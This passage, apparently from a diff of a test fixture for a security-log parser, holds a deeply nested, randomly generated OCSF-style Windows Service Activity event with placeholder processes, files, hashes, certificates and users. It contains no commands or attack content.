\"parent_folder\": \"lows fc focusing/canvas.pptx\", \"confidentiality\": \"engineers 
families bull\", \"hashes\": [{\"value\": \"F081F7B8D4310E67A7572F60B6070A3034D5F1AE1465B3FE4F8DAFCA9213A0E3\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"EAF741D48E0F26CA709BF17829C53A65D420FBD1F01B0F87BDE25230F1FF332E3D2BE89488F8277FA4B22FF53CC04FF382B19F42B7AC34C3EA5A0C0A89B19FCA\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Worn\", \"type\": \"Admin\", \"domain\": \"threatening parks application\", \"uid\": \"290fd5fe-a0cf-11ef-ab0d-0242ac110007\", \"type_id\": 2, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290fde14-a0cf-11ef-9211-0242ac110007\", \"loaded_modules\": [\"/yacht/payday/singer/stretch/hungry.heic\", \"/fa/bumper/represents/studio/shipments.ttf\"], \"cmd_line\": \"shopping appendix deluxe\", \"created_time\": 1731399707935, \"terminated_time\": 1731399707935}, \"xattributes\": {}}, \"xattributes\": {}}, \"terminated_time\": 1731399707935}}, \"terminated_time\": 1731399707935}}}, \"terminated_time\": 1731399707935}, \"sandbox\": \"snowboard lookup done\"}}}}, \"sandbox\": \"broke alternatives excessive\", \"xattributes\": {}}, \"sandbox\": \"mba ambassador shopping\"}}, \"terminated_time\": 1731399707935}}, \"user\": {\"name\": \"Hearing\", \"type\": \"Admin\", \"domain\": \"thinking answered refurbished\", \"uid\": \"290fefee-a0cf-11ef-ba87-0242ac110007\", \"type_id\": 2, \"ldap_person\": {\"email_addrs\": [\"Melodee@automotive.mobi\", \"Lulu@baby.name\"], \"employee_uid\": \"290ffac0-a0cf-11ef-a362-0242ac110007\", \"leave_time\": 1731399707936, \"office_location\": \"podcast cds lloyd\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 22}}, \"severity_id\": 3, \"status_code\": \"present\", \"status_detail\": \"shade accidents alice\", \"status_id\": 2, \"win_service\": {\"name\": \"balance pgp seasonal\", \"version\": \"1.3.0\", \"uid\": \"29101582-a0cf-11ef-a560-0242ac110007\", \"cmd_line\": \"honduras usa fact\", \"service_dependencies\": [\"enhancements occupations 
cause\", \"sw verification promotion\"], \"service_start_type\": \"Auto\", \"service_start_type_id\": 3, \"service_start_name\": \"golden thumbs crest\"}}"
+ },
+ "expected": {
+ "message": "{\"message\": \"gear technologies garlic\", \"status\": \"Failure\", \"time\": 1731399707936, \"device\": {\"owner\": {\"name\": \"Paper\", \"type\": \"Unknown\", \"domain\": \"comfort pick casino\", \"uid\": \"29093ba4-a0cf-11ef-a993-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"2909420c-a0cf-11ef-ae57-0242ac110007\"}, \"type\": \"IDS\", \"uid\": \"29092d44-a0cf-11ef-8baa-0242ac110007\", \"type_id\": 13, \"imei\": \"polyester verified charlie\", \"instance_uid\": \"29091d04-a0cf-11ef-8935-0242ac110007\", \"interface_name\": \"fonts roller schema\", \"interface_uid\": \"290925c4-a0cf-11ef-83a0-0242ac110007\", \"is_managed\": true, \"network_interfaces\": [{\"name\": \"nickname museums symptoms\", \"type\": \"Unknown\", \"hostname\": \"influenced.museum\", \"mac\": \"25:15:EA:C3:5F:12:EF:E9\", \"type_id\": 0}, {\"name\": \"polar bm traveler\", \"type\": \"Wired\", \"hostname\": \"vegetarian.store\", \"mac\": \"87:8C:2:BD:DD:A8:43:3A\", \"type_id\": 1}], \"region\": \"provider nirvana absolute\", \"risk_level\": \"Critical\", \"risk_level_id\": 4}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"pokemon know retrieval\", \"version\": \"1.3.0\", \"path\": \"dolls vid representing\", \"uid\": \"290890b4-a0cf-11ef-b8db-0242ac110007\", \"vendor_name\": \"hide broken trademark\"}, \"profiles\": [], \"log_name\": \"cindy drives thin\", \"log_provider\": \"foo canada biodiversity\", \"original_time\": \"virus pure partly\", \"processed_time\": 1731399707888}, \"start_time\": 1731399707936, \"severity\": \"Medium\", \"category_uid\": 1, \"activity_id\": 4, \"type_uid\": 20100404, \"type_name\": \"Windows Service Activity: Stop\", \"observables\": [{\"name\": \"generation damages hawaii\", \"type\": \"Email\", \"value\": \"sale talking pairs\", \"type_id\": 22}, 
{\"name\": \"testimonials seventh smallest\", \"type\": \"MAC Address\", \"type_id\": 3}], \"category_name\": \"System Activity\", \"class_uid\": 201004, \"class_name\": \"Windows Service Activity\", \"timezone_offset\": 72, \"activity_name\": \"Stop\", \"actor\": {\"process\": {\"name\": \"Don\", \"pid\": 38, \"file\": {\"name\": \"developmental.otf\", \"type\": \"Regular File\", \"path\": \"vg tunisia river/favorite.wsf/developmental.otf\", \"ext\": \"mike biography serial\", \"type_id\": 1, \"accessor\": {\"name\": \"Mathematical\", \"type\": \"Unknown\", \"domain\": \"touring wing sunglasses\", \"org\": {\"name\": \"battery met word\", \"uid\": \"29099612-a0cf-11ef-9f88-0242ac110007\", \"ou_name\": \"invitation olympus putting\"}, \"type_id\": 0, \"credential_uid\": \"29099f68-a0cf-11ef-ab1c-0242ac110007\", \"risk_level\": \"constitution missions steam\"}, \"parent_folder\": \"vg tunisia river/favorite.wsf\", \"confidentiality\": \"Top Secret\", \"confidentiality_id\": 4, \"hashes\": [{\"value\": \"9280AE13A255F18D841739D0D18222BB950C8FC7\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"security_descriptor\": \"gibson columbia refund\"}, \"user\": {\"name\": \"Journal\", \"type\": \"System\", \"domain\": \"tuition gst cheese\", \"uid\": \"2909b99e-a0cf-11ef-946c-0242ac110007\", \"groups\": [{\"name\": \"overview friendly ul\", \"desc\": \"spent richards molecular\", \"privileges\": [\"gale suicide combo\"]}], \"type_id\": 3, \"full_name\": \"Lynsey Sherise\"}, \"uid\": \"2909c8d0-a0cf-11ef-82af-0242ac110007\", \"cmd_line\": \"hdtv il murder\", \"created_time\": 1731399707895, \"parent_process\": {\"name\": \"Indoor\", \"pid\": 29, \"session\": {\"terminal\": \"eternal armor maternity\", \"uid\": \"290a04bc-a0cf-11ef-9799-0242ac110007\", \"uuid\": \"290a0af2-a0cf-11ef-8713-0242ac110007\", \"issuer\": \"troubleshooting footage pour\", \"created_time\": 1731399707897}, \"file\": {\"attributes\": 81, \"name\": \"submitted.cpp\", \"owner\": {\"name\": 
\"Reverse\", \"type\": \"Unknown\", \"domain\": \"wiki ba evaluating\", \"uid\": \"290a2bea-a0cf-11ef-a2af-0242ac110007\", \"type_id\": 0, \"email_addr\": \"Bessie@outcomes.pro\", \"risk_level\": \"plenty sarah preparation\"}, \"size\": 2618568753, \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"annually chapters country/separately.pdf/submitted.cpp\", \"modifier\": {\"name\": \"Appraisal\", \"type\": \"Admin\", \"uid\": \"290a3a2c-a0cf-11ef-96ea-0242ac110007\", \"type_id\": 2}, \"desc\": \"deeply dresses hills\", \"ext\": \"scholarships fundraising hydrocodone\", \"type_id\": 5, \"company_name\": \"Galen Nakita\", \"parent_folder\": \"annually chapters country/separately.pdf\", \"accessed_time\": 1731399707898, \"hashes\": [{\"value\": \"9E2FB759708B9621D802CC03D5DA0C1600A80AE7A740A0840F232C31B6E61F01EE5CF00A1719E67BEC538182D8A3074DA5123670601506065A44D4E8AC2C4CB2\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"user\": {\"name\": \"Asian\", \"type\": \"Unknown\", \"uid\": \"290a520a-a0cf-11ef-a44f-0242ac110007\", \"type_id\": 0, \"full_name\": \"Roland Nichol\", \"account\": {\"name\": \"girl sugar benefit\", \"type\": \"Azure AD Account\", \"uid\": \"290a5ef8-a0cf-11ef-809f-0242ac110007\", \"labels\": [\"complex\"], \"type_id\": 6}, \"credential_uid\": \"290a66e6-a0cf-11ef-a28e-0242ac110007\", \"uid_alt\": \"transportation vegetables debian\"}, \"uid\": \"290a756e-a0cf-11ef-86a9-0242ac110007\", \"cmd_line\": \"bull retailers sensitivity\", \"created_time\": 1731399707900, \"lineage\": [\"george herein ghz\"], \"parent_process\": {\"name\": \"Broader\", \"pid\": 50, \"file\": {\"name\": \"vegetation.tif\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"leonard accent told/determine.sdf/vegetation.tif\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"traffic changes calm\", \"issuer\": \"give img nsw\", \"fingerprints\": [{\"value\": 
\"7245C357B5BE2E81CFA6582A9CEF4108E8E9BC9E4DA47D108C495262F1EE943BB741CFFE5FDDEE5B3AD441498918E714FF20108B4CDDEDE100B8AD003E7DDA73\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"created_time\": 1731399707900, \"serial_number\": \"blades mike seal\"}, \"algorithm\": \"Authenticode\", \"algorithm_id\": 4}, \"desc\": \"electronics charges gallery\", \"ext\": \"disorder agriculture anger\", \"type_id\": 1, \"company_name\": \"Billie Shawnee\", \"mime_type\": \"briefly/entirely\", \"parent_folder\": \"leonard accent told/determine.sdf\", \"created_time\": 1731399707900, \"hashes\": [{\"value\": \"0947FCC917EB1D3C89AD818BEB61E3B2C3CF3BBA\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"CEE604715F44D7CD732D46B9B349EC7911E55D19C6E598E8064B403337EB8F9EA9E58A34D42BA046D72E529215E7D8E2AB68DA5552324343DA54BF3220615F0A\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"modified_time\": 1731399707900}, \"user\": {\"name\": \"Markers\", \"type\": \"Unknown\", \"uid\": \"290a9f62-a0cf-11ef-b0c9-0242ac110007\", \"groups\": [{\"name\": \"foul administrative owns\", \"uid\": \"290aaa98-a0cf-11ef-a3a1-0242ac110007\"}, {\"name\": \"develop houston gamma\", \"uid\": \"290ab498-a0cf-11ef-80bd-0242ac110007\", \"privileges\": [\"shade bell link\", \"processor code ashley\"]}], \"type_id\": 0, \"account\": {\"type\": \"AWS Account\", \"uid\": \"290abf42-a0cf-11ef-a831-0242ac110007\", \"type_id\": 10}}, \"uid\": \"290ac5dc-a0cf-11ef-a78c-0242ac110007\", \"cmd_line\": \"studies un checking\", \"created_time\": 1731399707902, \"integrity\": \"Unknown\", \"integrity_id\": 0, \"lineage\": [\"commodity config charges\", \"wikipedia las relatives\"], \"parent_process\": {\"name\": \"Eyed\", \"pid\": 59, \"user\": {\"name\": \"Louisiana\", \"type\": \"System\", \"uid\": \"290b1514-a0cf-11ef-9bd3-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"290b1cbc-a0cf-11ef-8f91-0242ac110007\", \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"uid\": 
\"290b241e-a0cf-11ef-89bc-0242ac110007\", \"cmd_line\": \"skins shipments proteins\", \"created_time\": 1731399707904, \"parent_process\": {\"name\": \"Almost\", \"pid\": 53, \"user\": {\"name\": \"Subscription\", \"type\": \"User\", \"domain\": \"lion aims yukon\", \"uid\": \"290b388c-a0cf-11ef-81e2-0242ac110007\", \"type_id\": 1}, \"uid\": \"290b3f44-a0cf-11ef-856f-0242ac110007\", \"cmd_line\": \"bidding lauren confusion\", \"created_time\": 1731399707905, \"parent_process\": {\"name\": \"Word\", \"pid\": 11, \"session\": {\"count\": 9, \"issuer\": \"practice attempt court\", \"created_time\": 1731399707905, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"attributes\": 44, \"name\": \"consistency.sln\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"handbags camera urgent/forecast.gz/consistency.sln\", \"ext\": \"entity fe blocking\", \"type_id\": 3, \"parent_folder\": \"handbags camera urgent/forecast.gz\", \"hashes\": [{\"value\": \"6D17DA8FAF5A7C8BD04AFB00506B03897D0DE6A8D7B4EBD644B680ACB98A1CFE8924C0F11BCCA03BFC8D47BE350C1C8A20AF62D4E02D978CB8159FB2D49086A7\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"BE412112026B3DCAEC7BE421BA9D884A2FBC5C9795F336CCBD0E8C76BFF312AA3BAFBB4BA71F540A076F5C0D8189254B397357A086D5B86B7D794FDCE6FCCFC1\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"is_system\": true}, \"user\": {\"type\": \"Unknown\", \"uid\": \"290b69f6-a0cf-11ef-a847-0242ac110007\", \"type_id\": 0}, \"uid\": \"290b720c-a0cf-11ef-a98d-0242ac110007\", \"cmd_line\": \"fears demanding stewart\", \"created_time\": 1731399707906, \"integrity\": \"High\", \"integrity_id\": 4, \"parent_process\": {\"name\": \"Kinds\", \"pid\": 63, \"session\": {\"uid\": \"290b83d2-a0cf-11ef-9629-0242ac110007\", \"uuid\": \"290b89cc-a0cf-11ef-89ef-0242ac110007\", \"issuer\": \"tray lying x\", \"created_time\": 1731399707907, \"is_remote\": true}, \"file\": {\"name\": \"concerns.cab\", \"type\": \"Character Device\", \"version\": 
\"1.3.0\", \"path\": \"faq payable progressive/part.m3u/concerns.cab\", \"ext\": \"imported supplements prepaid\", \"type_id\": 3, \"mime_type\": \"garmin/popularity\", \"parent_folder\": \"faq payable progressive/part.m3u\", \"hashes\": [{\"value\": \"E8A5CF21ECCC4DB4DAAFDD5BD0140861637D937597AD8EE0246E0715031FE6BDABB4F5B16FDDCACD9722B57A18B46453B01D984E3D55292FB82825C3A06E516A\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}, {\"value\": \"4B9E4636494461CF31094E9A16F456FE\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}]}, \"user\": {\"type\": \"remarkable\", \"type_id\": 99, \"full_name\": \"Jennell Sidney\", \"email_addr\": \"Clayton@scanned.travel\", \"ldap_person\": {\"location\": {\"desc\": \"Monaco, Principality of\", \"city\": \"Phil clarity\", \"country\": \"MC\", \"coordinates\": [113.7672, 53.7852], \"continent\": \"Europe\"}, \"given_name\": \"rachel trio electronics\", \"ldap_cn\": \"accessory fancy shelter\"}}, \"uid\": \"290babfa-a0cf-11ef-a1ee-0242ac110007\", \"cmd_line\": \"tuner clara concepts\", \"created_time\": 1731399707908, \"integrity\": \"boxes x day\", \"parent_process\": {\"name\": \"Animated\", \"pid\": 43, \"file\": {\"name\": \"pgp.rom\", \"type\": \"Symbolic Link\", \"path\": \"percent obtaining influenced/liked.bmp/pgp.rom\", \"signature\": {\"digest\": {\"value\": \"0A6CFE12D4BE13BD525E0097949ED52B4E032606B7BF98076581F2189F23342568BE12B631EF1F25F82E1979FC852ECA24E8A38B319B071638C3153E4DA60740\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, \"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290bcd06-a0cf-11ef-8f86-0242ac110007\", \"is_self_signed\": true, \"subject\": \"brilliant follow county\", \"issuer\": \"suppliers workout deposit\", \"fingerprints\": [{\"value\": \"03114C6B1064C1C04AE3C88FA18F582A2228B88A7786BBFCBCE275DED7A5C23A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": 
\"F07D26D3B025D5EF30B38458926092E990C3B6F0BE1A23B561D778E8467319E0444B2425FDEDB91121554B8641B06B3654426F63C9C0435C6487571DC9AE0FC5\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"created_time\": 1731399707908, \"expiration_time\": 1731399707909, \"serial_number\": \"hazard compaq emirates\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707909}, \"type_id\": 7, \"accessor\": {\"name\": \"Athletes\", \"type\": \"System\", \"uid\": \"290bdfe4-a0cf-11ef-88a6-0242ac110007\", \"org\": {\"name\": \"publicity porsche shoulder\", \"uid\": \"290bebf6-a0cf-11ef-bcbf-0242ac110007\", \"ou_name\": \"wins separate lemon\"}, \"groups\": [{\"name\": \"jose quotes toolbar\", \"uid\": \"290c038e-a0cf-11ef-beec-0242ac110007\"}], \"type_id\": 3, \"email_addr\": \"Sherry@machinery.store\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 25}, \"company_name\": \"Lashell Vincent\", \"mime_type\": \"representing/lee\", \"parent_folder\": \"percent obtaining influenced/liked.bmp\", \"hashes\": [{\"value\": \"E2F3E36EA43BA45AB3503CED0A944CD1A950065C\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"37DB034AE21206C4451CA1E72F6D031F77B7D0A27FF50009CFBECB868E7DE5C6\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"october surrey en\"}, \"uid\": \"290c11c6-a0cf-11ef-90cb-0242ac110007\", \"cmd_line\": \"wires wheels mf\", \"created_time\": 1731399707910, \"parent_process\": {\"name\": \"Petite\", \"pid\": 26, \"file\": {\"name\": \"difficulty.deskthemepack\", \"owner\": {\"name\": \"Costa\", \"type\": \"Unknown\", \"uid\": \"290c33c2-a0cf-11ef-87c6-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"manager\": {\"name\": \"Genetics\", \"type\": \"User\", \"domain\": \"gotta shades electron\", \"type_id\": 1, \"account\": {\"name\": \"hood consortium conversion\", \"type\": \"Windows Account\", \"uid\": \"290c4970-a0cf-11ef-8a6a-0242ac110007\", \"labels\": [\"dose\"], \"type_id\": 2}, \"risk_level\": 
\"High\", \"risk_level_id\": 3}, \"created_time\": 1731399707912, \"job_title\": \"bestsellers exactly diffs\", \"leave_time\": 1731399707912, \"surname\": \"responded pasta killed\"}}, \"type\": \"Symbolic Link\", \"path\": \"dimensions achieving ordinary/painting.sys/difficulty.deskthemepack\", \"product\": {\"name\": \"implications pizza christmas\", \"version\": \"1.3.0\", \"uid\": \"290c597e-a0cf-11ef-b883-0242ac110007\", \"vendor_name\": \"amateur faith fell\"}, \"uid\": \"290c6086-a0cf-11ef-90f6-0242ac110007\", \"ext\": \"transexuales sas operate\", \"type_id\": 7, \"accessor\": {\"name\": \"Giants\", \"type\": \"System\", \"domain\": \"pressure girl facility\", \"uid\": \"290c722e-a0cf-11ef-b5e2-0242ac110007\", \"type_id\": 3, \"full_name\": \"Marcene Goldie\", \"risk_score\": 35}, \"parent_folder\": \"dimensions achieving ordinary/painting.sys\", \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"created_time\": 1731399707913, \"hashes\": [{\"value\": \"B7B6604452EAF6AB6947459B4FA35CDFDCA39605BF415F77DDD90B47B7AE74ACC2BD0AB274FFC18792A7B43A7EE661EA8098EA69E1D0483392690A4D0BFFA60D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"type\": \"eau\", \"domain\": \"meaning feedback jan\", \"uid\": \"290c8624-a0cf-11ef-97f7-0242ac110007\", \"type_id\": 99, \"credential_uid\": \"290c8e30-a0cf-11ef-9434-0242ac110007\"}, \"created_time\": 1731399707913, \"parent_process\": {\"name\": \"Yards\", \"pid\": 15, \"file\": {\"name\": \"williams.xhtml\", \"type\": \"Folder\", \"path\": \"thailand diameter love/rachel.java/williams.xhtml\", \"signature\": {\"state\": \"diffs seasons conflicts\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"ethernet suitable brandon\", \"issuer\": \"optimization earliest differently\", \"fingerprints\": [{\"value\": 
\"BDD5C7FF933889BB4DE51943D295A2C3BF3CCE0EE5D7196DB36A7B734E44B9478FE798F4A6E72C0FB13B30746C0434F713614EBDB498B03029382CF837E23878\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"DEE5E5BE829C1FF9E773E27CDA4A8960CAB5C8A6F392DA6ACCBACB430B13B9BC64822221325357EAA87B60D5F4474090332CD89561EBEC061294834301DF9AE9\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731399707914, \"expiration_time\": 1731399707914, \"serial_number\": \"photographer tax up\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2}, \"uid\": \"290cc5f8-a0cf-11ef-92a0-0242ac110007\", \"ext\": \"alien cafe barriers\", \"type_id\": 2, \"parent_folder\": \"thailand diameter love/rachel.java\", \"confidentiality\": \"Private\", \"confidentiality_id\": 5, \"hashes\": [{\"value\": \"2B831F21DC87C2B301C73A0ACE1A47E607F1C5210E766355BD25B4E47948BBB20B677EE6C92C70765B352A0CCC29C89AB8D8D3489DEE0CCD7EDE26C6BDF6508F\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"se diabetes vitamin\"}, \"user\": {\"name\": \"Caps\", \"type\": \"System\", \"uid\": \"290cd5ca-a0cf-11ef-80bf-0242ac110007\", \"type_id\": 3, \"full_name\": \"Eve Roger\", \"account\": {\"name\": \"clearing deviant confidential\", \"type\": \"Apple Account\", \"uid\": \"290ce038-a0cf-11ef-8ee9-0242ac110007\", \"type_id\": 8}, \"email_addr\": \"Renda@antivirus.int\", \"uid_alt\": \"forced jvc archives\"}, \"uid\": \"290ce786-a0cf-11ef-9fc4-0242ac110007\", \"cmd_line\": \"reuters revolution thermal\", \"created_time\": 1731399707916, \"lineage\": [\"settled household february\", \"countries implemented chinese\"], \"parent_process\": {\"name\": \"Unions\", \"pid\": 41, \"file\": {\"name\": \"groups.part\", \"size\": 2002602281, \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"alice gnome diploma/consent.tex/groups.part\", \"product\": {\"name\": \"useful yen synopsis\", \"version\": \"1.3.0\", \"uid\": \"290d29f8-a0cf-11ef-a1a1-0242ac110007\", \"feature\": {\"name\": 
\"spider victor principle\", \"version\": \"1.3.0\", \"uid\": \"290d3420-a0cf-11ef-bd6a-0242ac110007\"}, \"url_string\": \"disagree\", \"vendor_name\": \"ist covered rock\"}, \"uid\": \"290d3b32-a0cf-11ef-bdef-0242ac110007\", \"ext\": \"glory regards somewhere\", \"type_id\": 3, \"company_name\": \"Melida Rosina\", \"parent_folder\": \"alice gnome diploma/consent.tex\", \"accessed_time\": 1731399707918, \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"hashes\": [{\"value\": \"A07C6F758C9EF024F836E2C0BD10FE9C43126081A22D73DD8040D8D179B10DEBE3BC9356500F5C7F0BA87256EFA37A673C190A0AC6F0BFC0529F9FC303878B00\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"isa action je\"}, \"user\": {\"name\": \"Messaging\", \"type\": \"System\", \"uid\": \"290d4c1c-a0cf-11ef-8059-0242ac110007\", \"type_id\": 3, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290d52b6-a0cf-11ef-9425-0242ac110007\", \"cmd_line\": \"rent seed gentleman\", \"created_time\": 1731399707918, \"lineage\": [\"pockets sponsor exactly\", \"disability syntax print\"], \"parent_process\": {\"name\": \"Corrections\", \"pid\": 10, \"file\": {\"name\": \"groove.xlsx\", \"owner\": {\"name\": \"February\", \"type\": \"User\", \"uid\": \"290d70de-a0cf-11ef-86d6-0242ac110007\", \"type_id\": 1, \"credential_uid\": \"290d775a-a0cf-11ef-afe6-0242ac110007\", \"email_addr\": \"Helena@songs.net\", \"risk_level\": \"High\", \"risk_level_id\": 3}, \"type\": \"Folder\", \"version\": \"1.3.0\", \"path\": \"announces contamination leisure/bits.kml/groove.xlsx\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290d9a32-a0cf-11ef-b46e-0242ac110007\", \"is_self_signed\": false, \"subject\": \"conferences kingdom charge\", \"issuer\": \"characterization relatively cas\", \"fingerprints\": [{\"value\": \"90F747EBF0E276407987570F6D39812AC53223E174E41CEDDD291A5F7136E3A6BEF9257C3C73FE3B92D5149E8E1C1BE08A61940CEB8AF03510E22E0492752C18\", \"algorithm\": 
\"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"63C326C6244EB0474D3008256E1217754BD2B836E98C247D0A19A57BF2AB18C7FF3D6BF574DB7E31FED2EEC3DA9B7CB69EDDD8DC256FEB8D5E822F176D8444A9\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"created_time\": 1731399707920, \"expiration_time\": 1731399707920, \"serial_number\": \"seed stupid slide\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2, \"developer_uid\": \"290da806-a0cf-11ef-a0a5-0242ac110007\"}, \"ext\": \"retired penn graduated\", \"type_id\": 2, \"parent_folder\": \"announces contamination leisure/bits.kml\", \"hashes\": [{\"value\": \"2A7F70F5957828EEA5C62064B4EB2A32561EB5B3003D729F2605228F225A85EF528EF7666F79B2810432D7E39CB959670A2EA9B1EDEB258E107F47E68D114FEC\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707921}, \"user\": {\"name\": \"Diagram\", \"type\": \"System\", \"domain\": \"existing jun treasury\", \"uid\": \"290db904-a0cf-11ef-aa9a-0242ac110007\", \"org\": {\"name\": \"coding maria scenarios\", \"uid\": \"290dc340-a0cf-11ef-9323-0242ac110007\"}, \"type_id\": 3, \"risk_score\": 79}, \"uid\": \"290dca20-a0cf-11ef-b98e-0242ac110007\", \"cmd_line\": \"mechanical estimates again\", \"created_time\": 1731399707921, \"parent_process\": {\"name\": \"Tabs\", \"pid\": 55, \"session\": {\"uid\": \"290deae6-a0cf-11ef-b636-0242ac110007\", \"issuer\": \"rat employer stadium\", \"created_time\": 1731399707922, \"credential_uid\": \"290df4e6-a0cf-11ef-9290-0242ac110007\", \"expiration_time\": 1731399707922, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"name\": \"integral.cpl\", \"owner\": {\"type\": \"sphere\", \"domain\": \"entirely gale inc\", \"type_id\": 99, \"account\": {\"name\": \"suits kim intellectual\", \"type\": \"AWS IAM User\", \"uid\": \"290e0f3a-a0cf-11ef-92a9-0242ac110007\", \"type_id\": 3}, \"risk_level\": \"carpet diamond departure\", \"uid_alt\": \"meta spank counts\"}, \"size\": 3671310304, \"type\": \"Symbolic Link\", \"path\": \"normal holds 
match/terrible.iso/integral.cpl\", \"modifier\": {\"name\": \"Acids\", \"type\": \"typing\", \"type_id\": 99}, \"uid\": \"290e1bec-a0cf-11ef-a719-0242ac110007\", \"ext\": \"stated smooth principles\", \"type_id\": 7, \"company_name\": \"Jeremiah Sonny\", \"parent_folder\": \"normal holds match/terrible.iso\", \"hashes\": [{\"value\": \"C449C98FCC2EDC7FE87FAF3FEF6C9D3F5499ACDC3BAC774F19D7B447B333103DCFED31CCAC83F9EE9D1E9601282E92EDA75DAEA8140D8C7EB9220338803C8D6E\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}]}, \"user\": {\"name\": \"Reduce\", \"type\": \"Admin\", \"domain\": \"preceding expressions your\", \"uid\": \"290e30c8-a0cf-11ef-8f59-0242ac110007\", \"groups\": [{\"name\": \"struggle photoshop walking\", \"desc\": \"sleep quoted able\", \"uid\": \"290e3b2c-a0cf-11ef-b7cf-0242ac110007\"}, {\"name\": \"ethiopia evaluate lover\", \"desc\": \"partition sound composition\"}], \"type_id\": 2, \"full_name\": \"Marisha Wesley\", \"ldap_person\": {\"cost_center\": \"spank universal techniques\", \"deleted_time\": 1731399707924, \"ldap_cn\": \"sight tale town\", \"leave_time\": 1731399707924, \"modified_time\": 1731399707924}}, \"uid\": \"290e4748-a0cf-11ef-8355-0242ac110007\", \"cmd_line\": \"flower arrest reveal\", \"created_time\": 1731399707925, \"parent_process\": {\"name\": \"Dip\", \"pid\": 99, \"session\": {\"uid\": \"290e5cb0-a0cf-11ef-8142-0242ac110007\", \"uuid\": \"290e63f4-a0cf-11ef-942e-0242ac110007\", \"issuer\": \"spirits up oral\", \"expiration_time\": 1731399707925, \"is_mfa\": false, \"is_remote\": true}, \"file\": {\"name\": \"fantasy.m4v\", \"owner\": {\"name\": \"Worse\", \"type\": \"User\", \"uid\": \"290e7628-a0cf-11ef-8429-0242ac110007\", \"groups\": [{\"name\": \"pierce deutschland scout\", \"type\": \"sacred mongolia edt\", \"uid\": \"290e8712-a0cf-11ef-b60b-0242ac110007\"}], \"type_id\": 1, \"full_name\": \"Tomika Renato\"}, \"type\": \"Regular File\", \"path\": \"approaches malpractice basics/lifetime.dxf/fantasy.m4v\", \"desc\": 
\"loops charm mpegs\", \"ext\": \"pork picked investigations\", \"type_id\": 1, \"parent_folder\": \"approaches malpractice basics/lifetime.dxf\", \"accessed_time\": 1731399707926, \"confidentiality\": \"subjective\", \"confidentiality_id\": 99, \"hashes\": [{\"value\": \"DB1A6CE0E4C6F3924C7CCA74924F4B0EF8BC0031\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"2B9A99087B9991B5EAD9406E2CAC8DA385815E6C3FA4DA96E1487782280E8E82FDBD3536F85994E271610D72C5A62E6F027E0CD37DA05806289882A1440BD441\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"xattributes\": {}}, \"user\": {\"name\": \"Expects\", \"type\": \"System\", \"domain\": \"blade keith manga\", \"uid\": \"290e9ba8-a0cf-11ef-9a18-0242ac110007\", \"type_id\": 3, \"account\": {\"name\": \"swedish ol flexible\", \"type\": \"GCP Account\", \"uid\": \"290ea6ca-a0cf-11ef-9b3b-0242ac110007\", \"type_id\": 5}, \"risk_level\": \"world feelings championships\"}, \"uid\": \"290eadbe-a0cf-11ef-9668-0242ac110007\", \"cmd_line\": \"iowa gear scheduling\", \"created_time\": 1731399707927, \"integrity\": \"Medium\", \"integrity_id\": 3, \"lineage\": [\"maximize associations reynolds\"], \"parent_process\": {\"name\": \"Themes\", \"pid\": 45, \"file\": {\"name\": \"designers.rpm\", \"type\": \"Named Pipe\", \"path\": \"votes year mice/fort.gpx/designers.rpm\", \"uid\": 